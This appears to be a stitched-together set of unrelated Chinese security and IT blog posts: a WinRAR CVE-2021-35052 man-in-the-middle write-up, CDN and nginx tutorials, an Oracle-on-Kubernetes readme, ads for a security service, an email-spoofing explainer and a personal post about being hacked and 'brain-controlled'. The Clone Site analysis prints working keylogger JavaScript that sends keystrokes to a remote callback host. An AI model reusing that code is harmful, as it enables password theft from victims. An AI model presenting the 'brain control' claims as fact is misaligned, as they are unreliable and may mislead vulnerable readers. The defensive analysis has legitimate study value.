注意:压缩文件管理软件漏洞可劫持计算机

注意:压缩文件管理软件漏洞可劫持计算机

WinRAR是Windows操作系统中非常常用的压缩文件管理软件,支持RAR和ZIP文件。试用版允许用户在一段时间内体验该应用的所有特征,试用期过后部分特征将被禁用。

近日,ptsecurity安全研究人员在WinRAR v5.70试用版中发现一个安全漏洞,该漏洞CVE编号为CVE-2021-35052。攻击者利用该漏洞可以拦截和修改发送给应用用户的请求,在受害者计算机上实现远程代码执行。

研究人员安装了该应用一段时间,任何发现出现了一个JS错误:

该JS错误表明,winRAR软件中内涵了WebBrowser JS分析器,此外使用了IE引擎来渲染该错误窗口。研究人员经过测试发现,一旦试用期结束,其中WinRAR.exe应用窗口就会出现上面的弹窗。该窗口使用mshtml.dll。

注意:压缩文件管理软件漏洞可劫持计算机

研究人员搭建了本地Burp Suite作为默认的Windows代理,并尝试拦截流量来了解错误产生的原因。因为该请求是通过HTTPS发送的,WinRAR会收到一个Burp使用了不安全的自签名证书的提醒。但在实际使用中,许多用户都会点击yes来进一步使用该使用。

研究人员拦截的WinRAR v 5.7.0版本 x64架构的请求如下所示:

然后,尝试修复拦截的WinRAR发送给用户的响应。研究人员发现如果响应代码修改为“301 Moved Permanently”,重定向到恶意域名“attacker.com”就会被缓存,所有的请求也就会经过“attacker.com”。

该中间人攻击要求进行ARP欺骗,因为研究人员假定攻击者和受害者处于同一网络域内。研究人员尝试了不同的攻击向量以确定如何才能访问:

上面的代码是一些潜在的攻击方式的欺骗响应,比如运行应用、提取本地主机信息、运行计算器等。

含有运行不同应用和打开系统文件的弹窗

在Windows系统中成功执行计算器应用

虽然大多数攻击向量都成功了,但许多注意的是许多仍然会引发Windows安全警告。要成功实现漏洞利用,用户就需要点击Run而不是cancel。

运行特定类型的文件会出现安全警告

但仍然有许多文件运行时不会出现安全警告,比如:

• .DOCX

• .PDF

• .PY

• .RAR

结论

第三方软件的管理是目前安全领域的重大挑战之一。因为安装后,第三方软件就可以读、写、修改设备上的数据。也无法审计用户安装的每个应用,所以管理与外部应用相关的风险和平衡不同应用的商业需求与风险是非常关键的。

本文翻译自:https://swarm.ptsecurity.com/winrars-vulnerable-trialware-when-free-software-isnt-free/

企业/个人建站防DDOS网络攻击教程

对于一个企业或者个人站长来说,DDOS攻击一直是一个很大的困扰。如今市面上的DDOS防御套餐又非常的贵,那么我们应该怎么才能降低成本还能达到防御网络攻击的效果呢?请看下面的教学讲解。

针对此类情况一般有两种网站,第一种是已经通过中国工信部ICP备案的,另一种是香港/国外大宽带主机或服务器。

我们先来说说第一种情况。已经通过ICP备案的,我们可以用国内的免费CDN或低成本CDN达到防御效果,下面介绍四个CDN商家。

1、CloudFlare

CloudFlare目前客户量已超300万,无论规模还是技术都当之无愧的世界第一安全CDN服务商,其创始人Matthew在哈佛商学院攻读MBA就着手创建CloudFlare,那时是2009年!它拥有全球14个区域的节点,美国、欧洲、亚太以及日本等多个地区都包括进去,使用领先的anycast技术,全球只显示一个IP,解决了全球大多数地区的线路问题,CloudFlare有很多牛B的功能,如边缘计算、Argo、WAF云防火墙,都是不错的功能,不过大多数是要收费的,免费版的可用的功能极少,但总得来说还是非常良心的。CloudFlare为用户不限量防御DDoS,而CC攻击需要用到WAF防火墙,这个只有收费版才支持,因此如果不缺钱的话,可以考虑入手收费版的,主机吧这边也提供有收费版的CloudFlare服务,大家可以看下。相关链接

2、百度云加速

百度云加速是百度旗下为网站提供一站式加速、安全防护和搜索引擎优化的产品。其海外节点是与CloudFlare合作的,后台功能也基本跟CloudFlare一致,目前是国内免费CDN中,用户量第一的,经过多年的更新,百度云加速不论是在稳定性还是在速度、安全这块都做得不错,免费版的更是推出了免费HTTPS,虽然免费版只有限制了每天10G的流量,不过对一般小网站来说是足够了,流量大的还是买收费版的吧,价格也不错,主机吧这边代理可以折扣一半。相关链接

3、腾讯云CDN

腾讯云CDN是腾讯云推出的一款网站加速CDN,是一款纯加速产品,国内节点比较多,每个域名可以分配到30个左右的节点,每个用户每月送10G流量包,对于一般的企业网站是够用的,当然如果你流量上来了,得买流量包了。需要注意的是腾讯云CDN是不带防护的,所以一但被攻击极有可能会严重消耗流量,而腾讯云的帐号是可以透支的,会出现帐户欠费的情况,曾经有一位站长就是被攻击一天欠了几千块钱,所以使用的时候一定要设置好每天使用量,以免造成不必要的麻烦。还要腾讯云HTTPS请求是收费的,HTTPS网站慎用了,细算下收费还是挺高的。

4、又拍云CDN

又拍云CDN是一个优秀的数据云存储和云分发平台,成立时间早于七牛云存储,在客户数量及口碑上都有不错的市场反馈,再加上高质量的图片存储服务,许多站长都对又拍云存储青睐有加。新用户在又拍云上每月有10GB空间及15GB流量,老用户则有18GB 流量。但是在你使用又拍云的免费CDN功能时,必须在博客或网站上添加一个指向又拍云的链接或者Logo,还是跟腾讯云一样,HTTPS请求是收费的。

添加CDN可以有效防止DDOS跟渗透测试网络攻击。

 

重点是国外的未备案的机器

对于国外未备案的主机,我们可以使用CloudFlare的CDN进行防御,那么有些用户说国内访问不友好?很慢?我们可以使用动静态分离来实现。(前提是你要有技术的情况下,或者是找会的人做防御)做完动静分离网站程序不是非常大的话都可以达到秒开的情况。

【不用ICP备案】还有一种就是进行反向代理,我们可以先购买一个国外的大宽带主机 有CN2线路的,最好离中国不是很远的这种,然后再去购买一个腾讯云的服务器,如轻量2H4G 8M 1200G流量,正常都够用了,我们通过反向代理速度延迟可以降低很多很多。

反向代理可以为您的网络及其安全性创造奇迹。了解如何配置NGINX以实现此目的。

管理员通常使用两种类型的代理:

客户端使用前向代理或简称为“代理”来绕过防火墙限制,或用作LAN的缓存服务器
反向代理用于帮助实现Web服务器的负载平衡和高可用性
显然,对于管理员来说,两者中最重要的是反向代理。正是这种类型的代理使公司可以在其网站上使用多个服务器,而反向代理充当流量管理器,可以将来自客户端的数据包定向到任何一个后端服务器。

当前,更流行的反向代理工具之一是NGINX。尽管NGINX本身是Web服务器,但它在充当反向代理方面做得非常出色。有了这个,您可以获得以下好处:

单点访问服务器
简化访问控制任务
降低敏感数据的风险
帮助实现合规
实现后端服务器的透明维护
负载平衡和故障转移
我将引导您使用NGINX设置非常基本的反向代理。在以后的教程中,我们将在此基础上添加功能。

你需要什么

使这项工作唯一需要的是Linux的运行实例。我将在Ubuntu Server 18.04上进行演示,但是您可以使用任何支持NGINX的发行版。如果您使用的不是基于Debian的发行版,则需要修改所有安装说明。

如何安装NGINX

我假设您没有安装NGINX。为此,请登录到您的Ubuntu Server实例并发出以下命令:

sudo apt-get install nginx -y

使用以下命令启动并启用该服务:

sudo systemctl start nginx

sudo systemctl enable nginx

如何创建一个新的NGINX配置文件

我们将创建一个全新的默认NGINX配置文件。在执行此操作之前,重要的是要使用以下命令取消链接原始的默认配置:

sudo unlink /etc/nginx/sites-enabled/default

现在,我们将使用以下命令创建新的配置文件:

sudo nano /etc/nginx/sites-available/proxy_config.conf

在该新文件中,粘贴以下内容:

server {

 

listen 80;

 

location / {

 

proxy_pass http://SERVER;

 

}

 

}

其中SERVER是您要向其发送流量的服务器的IP地址或域。

保存并关闭文件。

创建此新配置文件后,我们需要通过使用以下命令创建链接来激活它:

sudo ln -s /etc/nginx/sites-available/proxy_config.conf /etc/nginx/sites-enabled/proxy_config.conf

使用以下命令重新启动NGINX:

sudo systemctl restart nginx

如何测试反向代理

现在将NGINX配置为反向代理,打开浏览器并将其指向托管代理的服务器的地址。该地址应自动重定向到您在proxy_config.conf文件中使用proxy_pass伪指令设置的地址。

恭喜,您的基本NGINX代理服务器已启动并正在运行。现在,您可以将本应流向目标服务器的流量定向到反向代理服务器,然后流量将到达正确的目的地。

尽管此配置不会做太多事情,但是您现在已基本了解如何进行设置。下次,我们将使用相同类型的配置以NGINX作为反向代理来处理负载平衡。

参考:https://blog.csdn.net/allway2/article/details/107737082

如果你是资本玩家当我没说,直接上高防500G服务器,要买封UDP攻击的机房哦。

实现在 Kubernetes 上运行 Oracle 数据库

使用 El Carro 在 Kubernetes 上运行 Oracle

El Carro 是一个新项目,它提供了一种在 Kubernetes 中运行 Oracle 数据库的方法,作为可移植、开源、社区驱动、无供应商锁定的容器编排系统。El Carro 为全面一致的配置和部署以及实时操作和监控提供了强大的声明式 API。

高级概述

El Carro 可帮助您在 Kubernetes 中部署和管理 Oracle 数据库软件。您必须拥有适当的许可权才能将其与 El Carro (BYOL) 一起使用。

在当前版本中,您下载 El Carro 安装包,暂存 Oracle 安装软件,创建容器化数据库映像(带有或不带有种子数据库),然后创建一个实例(在 Oracle 中称为 CDB)并添加一个或更多数据库(称为 PDB)。

创建 El Carro 实例和数据库后,您可以进行基于快照或基于 RMAN 的备份并获取基本的监控和日志信息。将来的版本中将添加其他数据库服务。

执照通知

您可以使用 El Carro 自动供应和管理 Oracle 数据库快捷版 (XE) 或 Oracle 数据库企业版 (EE)。在每种情况下,您都有责任确保您拥有适当的许可,以便与 El Carro 一起使用任何此类 Oracle 软件。

另请注意,每个 El Carro “数据库”都将创建一个可插拔数据库,这可能需要 Oracle Multitenant 选项的许可。

Oracle 和 Java 是 Oracle 和/或其附属公司的注册商标。其他名称可能是其各自所有者的商标。

快速开始

我们建议先从快速入门开始,但随着您对 El Carro 越来越熟悉,请考虑按照下面链接的用户指南尝试更高级的功能。

如果您拥有 Oracle 12c EE 的有效许可,并希望在 Kubernetes 上启动并运行您的 Oracle 数据库,则可以按照此 快速入门指南进行操作

作为 Oracle 12c EE 的替代方案,您可以使用Oracle 18c XE ,它可以按照 Oracle 18c XE快速入门指南免费使用 。

如果您更喜欢在个人计算机上本地运行 El Carro,您可以按照minikube 上Oracle 用户指南kind 上的 Oracle 用户指南进行操作

准备

要准备 El Carro 下载和部署,请遵循 本指南

供应

El Carro 可帮助您轻松创建、扩展和删除 Oracle 数据库。

首先,您需要 创建一个容器化的数据库镜像

您可以选择创建一个默认的 Config 来设置命名空间范围的默认值来配置您的数据库,遵循 本指南

然后,您可以按照本指南创建实例(在 Oracle 中称为 CDB) 。然后,按照本指南创建数据库(称为 PDB)和用户 。

备份和恢复

El Carro 提供基于存储快照的备份/恢复和基于 Oracle 本机 RMAN 的备份/恢复功能,以支持您的数据库备份和恢复策略。

创建 El Carro 实例和数据库后,您可以按照本指南创建基于存储快照的备份 。

您还可以按照本指南创建基于 Oracle 本机 RMAN 的备份 。

要从备份恢复,请按照 本指南进行操作

数据导入导出

El Carro 提供基于 Oracle Data Pump 的数据导入/导出功能。

要将数据导入 El Carro 数据库,请按照 本指南进行操作

要从 El Carro 数据库导出数据,请按照 本指南进行操作

更重要的是?

El Carro 支持更多功能,更多功能即将添加!有关更多信息,请检查日志记录、 监控、 连接、 UI等。

贡献

非常欢迎您为 El Carro 项目做出贡献!

我们汇总了一组贡献和开发指南,您可以在本指南 中查看这些指南

支持

要报告错误或记录功能请求,请打开 GitHub 问题 并遵循提交错误的指南。

对于一般问题或社区支持,我们欢迎您加入 El Carro 社区邮件列表 并在那里提出您的问题。

参考:https://github.com/googlecloudplatform/elcarro-oracle-operator

Clone Site 自动克隆网站内容分析讲解教学

Clone Site 自动克隆网站内容分析。

热爱网页设计或者喜欢鼓捣网站的朋友而言,这篇文章比较有益你搞DIY~哈哈,可以克隆别人的网站内容模板,来设置自己喜欢的样式内容,话不多说往下看~

Clone Site 自动克隆网站内容分析讲解教学插图

克隆后的html和原html对比

Clone Site 自动克隆网站内容分析讲解教学插图1

特征:

  1. IFRAME标签为大写,且长宽为0。
  2. script标签加载了js路径为”/jquery/jquery.min.js”

序特征:

  1. IFRAME标签和脚本标签同时出现时,一定是IFRAME标签、脚本标签和body标签这个顺序。
  2. IFRAME 标签和脚本标签才出现一个时,一定在身体标签之前。

引用的js分析:

var cfqPdaQzXzSSf = 0;
window.onload = function%20loadfqPdaQzXzSSf() { //页面加载处理事件
    lfqPdaQzXzSSf = ",";
    if (window.addEventListener)  { //对象触发指定的事件
        document.addEventListener('keypress', pfqPdaQzXzSSf, true); //keypress所有键都会触发该事件,无论它们是否产生字符值 处理函数:pfqPdaQzXzSSf
        document.addEventListener('keydown', dfqPdaQzXzSSf, true); //keydown当按下某个键时会触发该事件 处理函数:dfqPdaQzXzSSf
    } else%20if (window.attachEvent)  { //attachEvent在IE9以下的版本中受到支持。其它的都支持addEventListener
        document.attachEvent('onkeypress', pfqPdaQzXzSSf);
        document.attachEvent('onkeydown', dfqPdaQzXzSSf);
    } else { //两者都不支持全部置空
        document.onkeypress = pfqPdaQzXzSSf;
        document.onkeydown = dfqPdaQzXzSSf;
    }


}


function%20pfqPdaQzXzSSf(e) {
    kfqPdaQzXzSSf = (window.event)?window.event.keyCode:e.which; //只有当DOM事件处理程序被调用的时
    kfqPdaQzXzSSf = kfqPdaQzXzSSf.toString(16); //将键盘码转换为ascii
    if (kfqPdaQzXzSSf != "d")  { //随便写个判断进入函数
        fqPdaQzXzSSf(kfqPdaQzXzSSf);
    }


}


function%20dfqPdaQzXzSSf(e) {
    kfqPdaQzXzSSf = (window.event)?window.event.keyCode:e.which;
    if (kfqPdaQzXzSSf == 9||kfqPdaQzXzSSf == 8||kfqPdaQzXzSSf == 13)  { //tab键,退格键,回车键
        fqPdaQzXzSSf(kfqPdaQzXzSSf);
    }


}


function%20fqPdaQzXzSSf(kfqPdaQzXzSSf) {
    lfqPdaQzXzSSf = lfqPdaQzXzSSf + kfqPdaQzXzSSf + ","; //键盘值拼接
    var tfqPdaQzXzSSf = "ZUyQXfawhPbi" + cfqPdaQzXzSSf;
    cfqPdaQzXzSSf++;
    var ffqPdaQzXzSSf;
    if (document.all&&(navigator.appVersion.match(/MSIE ([\d.]+)/)[1]) <= 8.0)  { //浏览器版本判断是否小于或等于8.0
        ffqPdaQzXzSSf = document.createElement(String.fromCharCode(60) + "script name='"+tfqPdaQzXzSSf+"' id='"+tfqPdaQzXzSSf+"'" + String.fromCharCode(62) + String.fromCharCode(60) + "/script" + String.fromCharCode(62));
    } else {
        ffqPdaQzXzSSf = document.createElement("script");
        ffqPdaQzXzSSf.setAttribute("id", tfqPdaQzXzSSf);
        ffqPdaQzXzSSf.setAttribute("name", tfqPdaQzXzSSf);
    }


    var ejDBFWFHhff = '?id=' + window.location.href.split(/\?id=/)[1]; //取键盘ascii码
    ffqPdaQzXzSSf.setAttribute("src", "http://10.23.66.18:8080/callback" + ejDBFWFHhff + "&data=" + lfqPdaQzXzSSf);
    ffqPdaQzXzSSf.style.visibility = "hidden";
    document.body.appendChild(ffqPdaQzXzSSf); //实例化js,发送键盘码
    if (kfqPdaQzXzSSf == 13||lfqPdaQzXzSSf.length > 3000)  { //判断键盘码为回车键置空lfqPdaQzXzSSf变量
        lfqPdaQzXzSSf = ",";
    }


    setTimeout('document.body.removeChild(document.getElementById("' + tfqPdaQzXzSSf + '"))', 5000); //延时5秒删除创建的js
}

页面加载处理事件,添加触发键盘点击时间的事件。触发事件的进入dfqPdaQzXzSS和dfqPdaQzXzSSf函数处理,最后调用fqPdaQzXzSSf函数,将键盘通过创建脚本标签将数据发送到终点。最后延迟5秒后删除创建的js

pfqPdaQzXzSSf函数:
键盘码转ascii码发送到fqPdaQzXzSSf函数

dfqPdaQzXzSSf函数:
如果按下tab键,退格键,回车键调用fqPdaQzXzSSf函数发送键盘

chrome动态调试

键盘码判断

键盘码判断
键盘码

键盘码
js创建发送键盘码到终点

js创建发送键盘码到终点

cs远端接收的密码

Clone Site 自动克隆网站内容分析讲解教学插图5

360空间绘测特征搜索:

response:"<head> <base href="%20AND response:"<link rel=\"shortcut icon\" type=\"image/x-icon\" href=\"/favicon.ico\">"%20AND response:"jquery/jquery.min.js\"></script> </body>"

response:"<head> <base href="%20AND response:"<link rel=\"shortcut icon\" type=\"image/x-icon\" href=\"/favicon.ico\">"%20AND response:"WIDTH=\"0\" HEIGHT=\"0\"></IFRAME>"
Clone Site 自动克隆网站内容分析讲解教学插图6

参考链接

https://mp.weixin.qq.com/s/1lZlqxTuEcS3VK1Ve8XDbA

https://422926799.github.io/posts/9efc32ef.html

黑客入侵私人电脑怎么办?玄天安网为您服务。

黑客入侵私人或公司电脑窃取资料文章,对个人及公司造成严重损失!玄天安网教您如何解决黑客攻击问题,您如果还有其他的问题可以进入我们的官网与我们取得联系,我们为您制定更高强度的网络安全布置,保障您的隐私安全!

黑客如何运作以及黑客如何保护自己?

当你的电脑遭到攻击时,你要明白,是你个人受到威胁而不是电脑。攻击者往往为了自己的利益而损害别人的利益。攻击者可以通过Internet访问你的PC,并且他们对你安全构成的威胁呈指数增长。黑客是未经用户授权,通常在你不知情或未经你同意的情况下来安装恶意软件,进而攻入你的PC系统。从而来窃取、更改或破坏你的个人信息。

他们会有着足够的知识、聪明的策略、牛B的技术来帮助他们访问了你的电脑而让你察觉不到。从而保护了自身安全。

黑客如何找到你并进行攻击?

任何使用连接到Internet的计算机的人都容易受到计算机黑客构成的威胁的影响。这些黑客通常使用网络钓鱼诈骗,垃圾邮件或即时消息以及虚假网站将危险的恶意软件发送到你的计算机并危及你的计算机安全。

(可参考往期文章 就存在你身边的黑客手段,你中招了吗? 了解更多黑客手段)

如果你没有受到防火墙的保护,计算机黑客也可以尝试直接访问你的计算机和私人信息。他们可以监视你的对话或细读你个人网站的后端。黑客通常以伪造的身份伪装,可以诱使你透露敏感的个人和财务信息,甚至更糟糕的事情。

黑客可以对你做什么?

当你的计算机连接到Internet时,黑客在你的PC上安装的恶意软件会在你不知情或未经你同意的情况下悄悄地传输你的个人和财务信息。或者,计算机黑客可能会突袭你不经意间泄露的私人信息。

无论哪种情况,他们都将能够:

  • 劫持你的用户名和密码
  • 窃取你的钱,并以你的名义开设信用卡和银行帐户
  • 破坏你的信誉
  • 申请新帐户个人识别码(PIN)或其他信用卡
  • 进行购买东西
  • 添加自己或他们作为授权用户控制的别名,以便更轻松地使用你的信用
  • 获得现金透支
  • 使用和滥用你的社会保险号
  • 将你的信息出售给将其用于非法或非法目的的其他方

在网络上缠扰人的黑客可能构成严重的身体威胁。同意与网上“朋友”或熟人见面时要格外小心,小心始终是确保安全的最佳方法。

如何判断你是否被黑了?

检查你的个人帐户,信用卡和文件的准确性。是否有无法解释的交易,是否有疑问或未经授权的更改。如果有的话,黑客安装的危险恶意软件可能已经潜伏。

上网时如何保护自己?

  • 持续检查个人帐户的准确性,并立即处理任何差异
  • 进入聊天室或发布个人网页时要格外小心
  • 限制你在个人网站上发布的个人信息,除非你能确保它是安全的
  • 仔细监视在线“朋友”或熟人的要求,以应对掠夺行为
  • 避免个人和财务信息进入在线对话
  • 同意与网上“朋友”或熟人见面时,请格外小心

防止黑客入侵的安全提示

  • 使用双重防火墙,打开电脑上的防火墙以及安全软件
  • 定期更新你的操作系统
  • 增加浏览器安全设置
  • 避免有问题的网站
  • 仅从你信任的站点下载软件。在下载之前,请仔细评估免费软件和文件共享应用程序。

练习安全的电子邮件和病毒/恶意软件协议

  • 不要打开来自未知发件人的邮件
  • 立即删除你怀疑是垃圾邮件的邮件
  • 确保你的PC上安装了最好的安全软件产品:
  • 使用防病毒保护
  • 获得反间谍软件(安全软件)保护

在未受保护情况下的电脑,就像是黑客们的桌上菜。可随意进入你的电脑系统,进行非法操作!电脑上可安装安全软件,防止病毒的侵入。这里我给大家准备了火绒,在公众号内回复 火绒 即可获取安装包!做好防范意识,安全上网。

总结:网络有风险,上网需谨慎!!!

智能家居遭受黑客入侵,玄天安网为您服务解决问题。

引言:在如今发达的互联网时代,我们使用的家居也是越来越智能。但因为联网的缘故,我们的家居更容易遭受黑客的入侵及骚扰。在暗网之中不法分子出售别人家私人监控获取盈利..你的一举一动都有无数双眼睛盯着,对个人隐私造成严重影响。

虽然使用智能家居设备可以提升你的生活环境,但它也可能使你的家庭成为充满窥视和犯罪活动的生活地狱。英国消费者团体Which? 的一项新调查发现,配备了智能家居设备的房子每周可能遭受超过一万次的黑客攻击。

在与NCC集团和全球网络联盟(GCA)的合作下,Which? 为一栋房子配备了一系列智能家居设备,包括电视、恒温器,甚至水壶。接下来的情况相当令人震惊:新的智能家居遭受了许多网络攻击,最终在一小时内攀升到14次。结论是,大多数设备可以成功避免攻击,但亚马逊的一个摄像头被黑,并允许威胁者试图监视家里的人。

调查的结果

总的来说,在5月的第一周测试中,Which? 记录了来自全球不同地点的1017次黑客攻击企图,随后在最严格的一周测试中发生了12807次事件。

受攻击最多的设备是一台爱普生打印机,但它被证明是安全的。一台从亚马逊购买并被宣传为公司选择的ieGeek相机的情况并不理想,在此份报告发布后不久就被从商店中删除。

有趣的是,这并不是第一起与亚马逊有关的相机容易被黑客攻击的事件。2019年,在一连串成功的黑客尝试使用DDoS该公司的摄像头和麦克风之后,许多消费者团体站出来敦促用户不要购买亚马逊的Ring设备。

为什么有人会黑进你的家?

如果你家里的大部分东西都是以数字方式治理的,黑客就会有更大的攻击面。试图访问你的智能家居设备可以有各种目的,从接管你的网络到窃取你的数据,甚至要求赎金以获得敏感信息。

一些相对无辜但令人讨厌的黑客将只是试图通过按照威胁者的意愿控制你的设备来刺激你。一些更严重的黑客攻击将包括监听你的谈话,绘制你的日常生活,并检查你何时离开和回家。

你能做些什么来保护你的智能家居?

幸运的是,你有很多方法来保护你的智能家居设备。始终使用一个强大的wifi密码和VPN,以确保你的连接是加密的。此外,在所有个人账户上启用多因子验证(口令、短信验证码等),保持最新的软件版本,并为客人使用一个单独的Wi-Fi网络(访客Wifi)。当涉及到保护你的智能家居设备时,这些相对简单的网络安全建议可以产生极大的效果。

但对于一些专门攻击家庭网络设备的黑客而言,没做高强度的安全防御是不行的。您可以联系我们,说明情况情况,我们为您定制军工级网络安全解决计划!

被黑客监控_生活恐慌。玄天安网教你解决!

在如今网络发达的时代,网络安全已经是我们生活中的重中之重,习大大曾说‘网络安全就是国家安全。’这句话一点没错,一些不做好事的坏黑客可能已悄悄潜入到我们的生活当中,给我们的日常生活造成了不小的困扰…

玄天安网是新一代互联网安全的守护者,您如果遇到这类的问题,可以及时与我们取得联系。我们解决您的困扰。您可以点击下方链接进入到我们的家庭防御业务介绍之中,了解并联系我们。

玄天安网 – 家庭网络安全服务

以下文章来自被困扰的网络朋友:

我多年前就发现这个事情,一直到现在我经历了很多痛苦,但是现在依旧还在恶人得逞,我没有隐私而言。

我换过很多智能手机(苹果、安卓、原生安卓、黑莓系统)以及也换了很多张卡(移动联通电信足有10多张)

但是依旧躲不过对方的强大黑客技术,现在我被迫用老年非智能手机,还好,虽然连不了网,但是能用短信和电话和身边的朋友安全的联系我也满足了。包括我的其它智能联网设备笔记本也被我改装了,现在都是处于单机的情况下对方才得逞不了。

事情是这样的:在前几年我不接受这件事情的事实所以我怀疑自身问题,但是就在半年前又开始了,我发现我如果不面对事实我将无法正常的面对生活。

本人在读大学,前不久我在淘宝浏览东西的时候我在搜自行车,突然房外听见一群学生有一个说了一个词“自行车”,我当时就蒙了,难不成真的有人在监控我?但我知识有限我认为不可能会录屏直播这种技术的存在吧,所以我告诉自己这是一个巧合罢了。

期间还发生了很多这种类似的事。。。

直到有一件事,那天我和我爸用微信发了一段文字,还是房外走来一群学生嘻嘻哈哈,听到一个女生讲出了一段文字。我听到后简直崩溃掉了。。。

期间还发生了很多这种类似的事。。。

还有一次我出门准备去洗澡和我同学打了招呼就准备出门了,到了门外旁边的一个女生宿舍楼上传来一句话:去洗澡。我虽然很恼火但是我知道这只会让那个罪犯更加的得逞,他发布的这些录屏加上环境麦克风录音的直播链接被这些我不认识的学生好奇的点开了,他们这些学生不过是一些傀儡机(类似于DDOS攻击),我开始接受忍耐的磨砺,不去理会这些法盲的学生而是想着怎么去把那个人找到。

期间还发生了很多这种类似的事。。。

在这些事之后我开始怀疑的不是我经历的这个事实,而是怀疑我的知识见识不够,所以我一边慢慢的戒掉手机一边上网搜集一些计算机的技术资料。到现在我虽然做不到这种技术,但我完全的相信有这种技术实现,下面是其中一些的技术资料,我身为稍微了解计算机知识的人,感觉不能完全看懂:

Android实现录屏直播(二) blog.csdn.net/zxccxzzxz

Android实现录屏直播(一)blog.csdn.net/sinat_282

Android利用ADB进行屏幕录制 – pochenpiji159的博客 – CSDN博客 blog.csdn.net/pochenpij

安卓 rtmp推流+录屏+远程控制-CSDN下载 安卓 rtmp推流+录屏+远程控制

真实可用的安卓手机屏幕(录屏)录制,绝对不坑(apk)-CSDN下载 真实可用的安卓手机屏幕(录屏)录制,绝对不坑(apk)-CSDN下载

(iOS开发) 录屏功能的实现~包括暂停和继续功能 – wf990051004的博客 – CSDN博客 blog.csdn.net/wf9900510

5G到来之前还面临着哪些安全问题? – 移动通信 – 电子发烧友网 5G到来之前还面临着哪些安全问题? – 移动通信 – 电子发烧友网

黑客如何做到轻易控制手机信号塔 | 漏洞银行(BUGBANK) 漏洞银行(BUGBANK)

史上最严重移动通信漏洞曝光:可控制几乎所有手机 – 手机,网络安全 – IT之家 史上最严重移动通信漏洞曝光:可控制几乎所有手机 – 手机,网络安全 – IT之家

在这里我不过多的给大家脑补即证明此技术的存在,我发帖的原因其实只是我想摆脱并且过上正常的生活。

在发帖之前我去各种途径报过案,但是效率很低到现在还没有解决。我也理解我的这个案件属于高智商犯罪而且案例几乎没有,至于让我取证方面又很难,帮助我的警察很多我很感激但是时代在变化,关于互联网的犯罪以后也只会增多而不会减少,我非常的想联合大家希望有关部门成立一个类似于香港地区的隐私专员公署wanfangdata.com.cn/deta

我现在的生活因为这个事情虽然一团糟,但是这只会让我更加的坚强的去面对生活,我希望的不止是我能拥有隐私权的保障,也希望在法律以及执行机构上有一个强有力的保障供公民去寻求隐私的保护和对正义的全然昂视。

分界线

不是简单的黑客入侵设备。。。。。。。

在19年7月我才知道我是被脑控了,之前看过这个东西以为不可能的技术,现在看来我是低估这个社会的科技以及对“技术封锁”一词领悟很深。“脑控”受害者致全国同胞的呼吁信 weibo.com/ttarticle/p/s

脑控受害者是个群体,中国有几十万,对方是低素质垃圾的脑控组织,他们很厉害,不说多了,要不然被封。

Continue reading

黑客冒充他人电子邮件进行诈骗

本文主要分析网络犯罪分子如何通过更改邮件的From(发件人)标头来进行邮件欺诈。

域名欺骗

邮件欺诈的最简单形式之一是域名欺骗,指的是将目标发件人的域名插入到From标头中,使用户很难区分真实来源。

网络犯罪分子如果要以别人的名义发送邮件,并不是一件难事,网上不乏此类脚本或程序。由于SMTP(简单邮件传输协议,TCP/IP网络中的主要电子邮件传输协议)不提供此类保护,因此当攻击者获取到目标受害者信任的发件人地址时,能诱导他们执行特定操作,比如单击钓鱼链接、转账汇款、下载恶意文件等。为了增加可信度,攻击者还会模仿发件人的风格或身份证明,并强调任务的紧迫性以增加成功的概率。

为了解决这种欺诈,目前市面上有几种身份验证方法:SPF、DKIM和DMARC。通过这些方式让得到验证后的信息实际上从指定地址发送。

· SPF(发件人策略框架)标准允许邮件域所有者限制可以从该域发送消息的IP地址集,并允许邮件服务器检查发件人的IP地址是否被域所有者授权。但是,SPF不检查From头,而是检查SMTP信封中指定的发件人域,该域用于在邮件客户端和服务器之间传输邮件路由信息,不会显示给收件人。

· DKIM通过基于存储在发件人服务器上的私钥生成的数字签名来解决发件人身份验证问题。用于验证签名的公钥放在负责发件人域的DNS服务器上。如果消息是从不同的域发送的,则签名将无效。但是该技术有一个弱点:攻击者可以发送没有DKIM签名的假电子邮件,且信息将无法验证。

· DMARC(基于域的消息身份验证、报告和一致性)用于根据DKIM/SPF验证域检查From标头中的域。使用DMARC,则域名欺骗的消息无法通过身份验证。如果政策严格,DMARC还可以阻止特定的电子邮件。

随着上述技术的广泛实施,攻击者要么采取其他方法,要么报希望于他们所冒充的公司没有正确配置邮件身份验证,遗憾的是,这种现象依然很常见。

显示名称欺骗

显示名称是发件人的姓名或昵称,显示在电子邮件地址之前的发件人标头中。如果是公司邮件,则通常是相关部门或个人的真实姓名。

电子邮件欺诈:攻击者如何冒充合法发件人

显示名称的示例

为了使收件人的邮件看上去不那么混乱,许多邮件客户端隐藏了发件人的地址,只显示显示名称,这也给了犯罪分子可乘之机,不过From标头中还是显示了他们的真实地址,由于此地址通常受到DKIM签名和SPF的保护,也会被身份验证机制将消息视为合法的,只要受害者不注意看就容易上当。

幽灵欺骗

幽灵欺骗为此类的最常见形式。攻击者除了伪造发件人个人或公司的名称,还连带了发件人的地址,如下面的示例所示。

电子邮件欺诈:攻击者如何冒充合法发件人

幽灵欺骗的示例

实际上消息来自完全不同的地址。

电子邮件欺诈:攻击者如何冒充合法发件人

幽灵欺骗中的真实发件人地址和邮件身份验证

AD欺骗

AD(Active Directory)欺骗是另一种形式的显示名称欺骗,但与幽灵欺骗不同,它直接以发送人的名字设置邮件地址。

电子邮件欺诈:攻击者如何冒充合法发件人

AD欺骗示例

这种方法看起来比幽灵欺骗更原始,但幽灵欺骗在技术上更容易被垃圾邮件过滤器拦截,而AD欺骗至少能将邮件发送到垃圾邮件文件夹,封锁所有来自与同事或公司同名地址的电子邮件通常也不太现实。

相似域名欺骗

此类攻击要更为复杂些,需要攻击者寻找类似目标组织的域名并注册。查找和购买域名都需要付出更多时间,之后在其上设置邮件、DKIM/SPF签名和DMARC身份验证,这比简单地修改From标头要困难得多,但这也为识别机制带来阻碍。

例如,下面截图中的电子邮件来自域名deutschepots.de,受害者很容易与德国邮政公司DeutschePost(deutschepost.de)的域名混淆。如果点击了此类电子邮件中的链接并尝试支付包裹递送费用,不仅会损失3欧元,还会将信用卡详细信息交给犯罪分子。

电子邮件欺诈:攻击者如何冒充合法发件人

来自相似域的消息示例

Unicode欺骗

Unicode欺骗指的是域名中的ASCII字符被替换为Unicode集中的相似字符。了解此技术需要了解使用非拉丁字符的域是如何编码的。Punycode是一种将Unicode字符转换为ASCII兼容编码(ACE)表示的方法,由拉丁字母、连字符和0到9的数字组成。同时,许多浏览器和邮件客户端显示域的Unicode版本。例如,这个俄罗斯域名:

касперский.рф

